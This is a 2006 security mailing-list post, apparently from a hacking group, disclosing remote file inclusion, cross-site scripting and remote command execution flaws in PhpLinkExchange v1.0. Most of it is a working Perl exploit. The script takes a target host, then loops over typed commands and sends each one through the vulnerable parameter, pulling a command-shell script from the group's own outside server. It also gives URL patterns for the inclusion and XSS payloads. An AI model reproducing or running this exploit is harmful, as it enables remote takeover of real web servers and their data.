PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit] Sep 09 2006 01:07AM
ali hackerz ir
vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart
=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

remote command Exploit :

#!/usr/bin/perl

#

# Exploit by s3rv3r_hack3r

######################################################

# ___ ___ __ #

# / | \_____ ____ | | __ ___________________ #

#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #

#\ Y // __ \\ \___| <\ ___/| | \// / #

# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #

# \/ \/ \/ \/ \/ \/ #

# Iran Hackerz Security Team #

# WebSite: www.hackerz.ir & www.h4ckerz.com

######################################################

use LWP::Simple;

print "-------------------------------------------\n";

print "= Iran hacekerz security team =\n";

print "= By s3rv3r_hack3r - www.hackerz.ir =\n";

print "-------------------------------------------\n\n";

print "Target >http://";

chomp($targ = <STDIN>);

print "your web site name >";

chomp($cmd= <STDIN>);

$con=get("http://".$targ."/bits_listings.php") || die "[-]Cannot connect to Host";

while ()

{

print "command\$";

chomp($cmd=<STDIN>);

$commd=get("http://".$targ."/bits_listings.php?svr_rootPhpStart=http://w
ww.hackerz.ir/cmd.txt?cmd=".$cmd)

}

+++++

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus